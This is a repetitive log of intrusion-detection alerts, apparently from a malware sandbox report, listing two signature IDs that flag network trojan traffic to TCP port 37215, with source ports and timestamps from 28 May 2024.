          SID:2835222
          Source Port:48800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.056855
          SID:2835222
          Source Port:43630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.608796
          SID:2829579
          Source Port:45498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195881
          SID:2829579
          Source Port:46790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.111341
          SID:2835222
          Source Port:36902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.186154
          SID:2829579
          Source Port:51898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774341
          SID:2829579
          Source Port:47828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473358
          SID:2829579
          Source Port:59558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764317
          SID:2835222
          Source Port:46398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953590
          SID:2835222
          Source Port:39306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326618
          SID:2829579
          Source Port:54928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796024
          SID:2835222
          Source Port:59560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334225
          SID:2835222
          Source Port:38312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271077
          SID:2829579
          Source Port:39568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.772194
          SID:2835222
          Source Port:47204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.079625
          SID:2835222
          Source Port:52620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594622
          SID:2835222
          Source Port:55380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551208
          SID:2829579
          Source Port:59730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.980737
          SID:2829579
          Source Port:46154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.113009
          SID:2829579
          Source Port:38294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528262
          SID:2835222
          Source Port:53788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183820
          SID:2835222
          Source Port:59738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839687
          SID:2835222
          Source Port:42214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168188
          SID:2835222
          Source Port:59336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.806892
          SID:2835222
          Source Port:59016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336639
          SID:2829579
          Source Port:49438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.542366
          SID:2829579
          Source Port:53756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890609
          SID:2835222
          Source Port:38562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.247061
          SID:2835222
          Source Port:53168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.299605
          SID:2835222
          Source Port:37050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.059715
          SID:2835222
          Source Port:51560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605102
          SID:2829579
          Source Port:57370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729106
          SID:2835222
          Source Port:33176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178916
          SID:2829579
          Source Port:33476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195387
          SID:2835222
          Source Port:35060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.809160
          SID:2835222
          Source Port:34846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892812
          SID:2829579
          Source Port:49854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944055
          SID:2835222
          Source Port:47714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671904
          SID:2835222
          Source Port:34272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125842
          SID:2829579
          Source Port:60202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708437
          SID:2829579
          Source Port:36906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.130709
          SID:2835222
          Source Port:39258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116938
          SID:2829579
          Source Port:39710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.301265
          SID:2835222
          Source Port:54032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.691538
          SID:2835222
          Source Port:44044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840484
          SID:2829579
          Source Port:53834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299572
          SID:2829579
          Source Port:36678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369137
          SID:2835222
          Source Port:46576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.235777
          SID:2835222
          Source Port:45282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.507838
          SID:2829579
          Source Port:35266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.675409
          SID:2829579
          Source Port:49246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.079660
          SID:2829579
          Source Port:38534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266903
          SID:2835222
          Source Port:41902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.817729
          SID:2835222
          Source Port:47884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.712243
          SID:2835222
          Source Port:41042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964455
          SID:2835222
          Source Port:47282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.305553
          SID:2829579
          Source Port:52358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.487484
          SID:2829579
          Source Port:41976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112273
          SID:2829579
          Source Port:58686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178153
          SID:2829579
          Source Port:43474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202578
          SID:2835222
          Source Port:51844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756402
          SID:2829579
          Source Port:60824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876137
          SID:2829579
          Source Port:56470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876964
          SID:2829579
          Source Port:59930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183756
          SID:2835222
          Source Port:48252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.434903
          SID:2829579
          Source Port:43954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299000
          SID:2829579
          Source Port:57884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797384
          SID:2835222
          Source Port:40640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.733143
          SID:2829579
          Source Port:38754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547771
          SID:2829579
          Source Port:52368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.552165
          SID:2835222
          Source Port:36482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.973115
          SID:2829579
          Source Port:56716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223133
          SID:2829579
          Source Port:42948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.185865
          SID:2829579
          Source Port:50662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.806688
          SID:2829579
          Source Port:52518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594728
          SID:2835222
          Source Port:51872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.154059
          SID:2829579
          Source Port:37498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322166
          SID:2829579
          Source Port:44140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890950
          SID:2835222
          Source Port:45002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.613687
          SID:2835222
          Source Port:32942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.974035
          SID:2835222
          Source Port:54580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593259
          SID:2835222
          Source Port:59194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.212804
          SID:2829579
          Source Port:60836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529016
          SID:2829579
          Source Port:55752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878276
          SID:2835222
          Source Port:52168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.436554
          SID:2835222
          Source Port:38444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.167722
          SID:2829579
          Source Port:36906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.561652
          SID:2835222
          Source Port:40744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.618658
          SID:2835222
          Source Port:52522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598907
          SID:2835222
          Source Port:40674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.022961
          SID:2829579
          Source Port:52020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177176
          SID:2835222
          Source Port:50720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.655902
          SID:2835222
          Source Port:54484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.813682
          SID:2835222
          Source Port:41478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923005
          SID:2829579
          Source Port:38112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739355
          SID:2829579
          Source Port:52292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268576
          SID:2835222
          Source Port:48272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.186068
          SID:2835222
          Source Port:41242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476778
          SID:2835222
          Source Port:41908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.552075
          SID:2835222
          Source Port:48184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.283782
          SID:2835222
          Source Port:45368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.738288
          SID:2835222
          Source Port:55680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267328
          SID:2829579
          Source Port:41534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.125271
          SID:2835222
          Source Port:47048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.217129
          SID:2835222
          Source Port:37448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.977708
          SID:2835222
          Source Port:53516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.810437
          SID:2835222
          Source Port:53872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.976120
          SID:2835222
          Source Port:45048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271909
          SID:2829579
          Source Port:42656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402878
          SID:2835222
          Source Port:50880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842346
          SID:2829579
          Source Port:52756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.980677
          SID:2835222
          Source Port:60722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.819429
          SID:2835222
          Source Port:38062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114183
          SID:2835222
          Source Port:60232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.672207
          SID:2835222
          Source Port:60266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267423
          SID:2829579
          Source Port:39070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.595286
          SID:2835222
          Source Port:55688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.781357
          SID:2835222
          Source Port:42178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.813283
          SID:2829579
          Source Port:51514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269160
          SID:2835222
          Source Port:46178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689238
          SID:2829579
          Source Port:46600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.077636
          SID:2835222
          Source Port:55812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.991983
          SID:2835222
          Source Port:56986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547860
          SID:2829579
          Source Port:45716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.105591
          SID:2835222
          Source Port:50904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.628790
          SID:2835222
          Source Port:60620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846934
          SID:2829579
          Source Port:44376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941469
          SID:2829579
          Source Port:37168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.235790
          SID:2829579
          Source Port:36552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.498155
          SID:2835222
          Source Port:43374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794124
          SID:2829579
          Source Port:49470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336389
          SID:2829579
          Source Port:42014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666791
          SID:2835222
          Source Port:59002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326373
          SID:2835222
          Source Port:38948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.364122
          SID:2829579
          Source Port:50302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.293920
          SID:2835222
          Source Port:46360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126804
          SID:2835222
          Source Port:58474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.163805
          SID:2835222
          Source Port:47478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.090443
          SID:2835222
          Source Port:59516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.860963
          SID:2829579
          Source Port:41004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112273
          SID:2829579
          Source Port:52496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537537
          SID:2835222
          Source Port:37530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.562120
          SID:2829579
          Source Port:45316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.329044
          SID:2835222
          Source Port:57768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.625714
          SID:2835222
          Source Port:46590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536685
          SID:2829579
          Source Port:57846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979304
          SID:2835222
          Source Port:35796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473712
          SID:2835222
          Source Port:40512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591711
          SID:2829579
          Source Port:37558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846926
          SID:2835222
          Source Port:41166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196766
          SID:2835222
          Source Port:56734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958843
          SID:2829579
          Source Port:47486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.986060
          SID:2829579
          Source Port:43324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.561114
          SID:2829579
          Source Port:57966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.234606
          SID:2835222
          Source Port:55340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.562977
          SID:2835222
          Source Port:60764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.046954
          SID:2829579
          Source Port:33928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.942325
          SID:2835222
          Source Port:58030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401605
          SID:2835222
          Source Port:35006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.221170
          SID:2829579
          Source Port:46582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.799781
          SID:2835222
          Source Port:57256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.707733
          SID:2835222
          Source Port:53594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711145
          SID:2835222
          Source Port:42102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.885578
          SID:2829579
          Source Port:40324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.228241
          SID:2829579
          Source Port:33944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472312
          SID:2835222
          Source Port:35950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.223650
          SID:2835222
          Source Port:53454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480809
          SID:2835222
          Source Port:51518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322909
          SID:2829579
          Source Port:56132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.863333
          SID:2829579
          Source Port:54590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.657757
          SID:2829579
          Source Port:38972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594613
          SID:2835222
          Source Port:51658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669710
          SID:2829579
          Source Port:43312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652436
          SID:2835222
          Source Port:57712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.821806
          SID:2835222
          Source Port:43284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214116
          SID:2829579
          Source Port:45544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959602
          SID:2835222
          Source Port:53488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.136808
          SID:2835222
          Source Port:34116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.852591
          SID:2829579
          Source Port:33534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.990262
          SID:2835222
          Source Port:60778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.539138
          SID:2835222
          Source Port:46804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.552288
          SID:2829579
          Source Port:52366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.231822
          SID:2835222
          Source Port:41360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.186219
          SID:2829579
          Source Port:40220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324729
          SID:2829579
          Source Port:54320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.983611
          SID:2835222
          Source Port:34470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048529
          SID:2835222
          Source Port:57734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944196
          SID:2829579
          Source Port:58790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.162349
          SID:2835222
          Source Port:36484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.239422
          SID:2829579
          Source Port:60634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.613811
          SID:2835222
          Source Port:60014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.164507
          SID:2835222
          Source Port:55504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.552056
          SID:2829579
          Source Port:58068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061240
          SID:2835222
          Source Port:42266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.772155
          SID:2835222
          Source Port:51032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710965
          SID:2835222
          Source Port:53762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.059679
          SID:2829579
          Source Port:59702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196728
          SID:2835222
          Source Port:53646
          Destination Port:37215
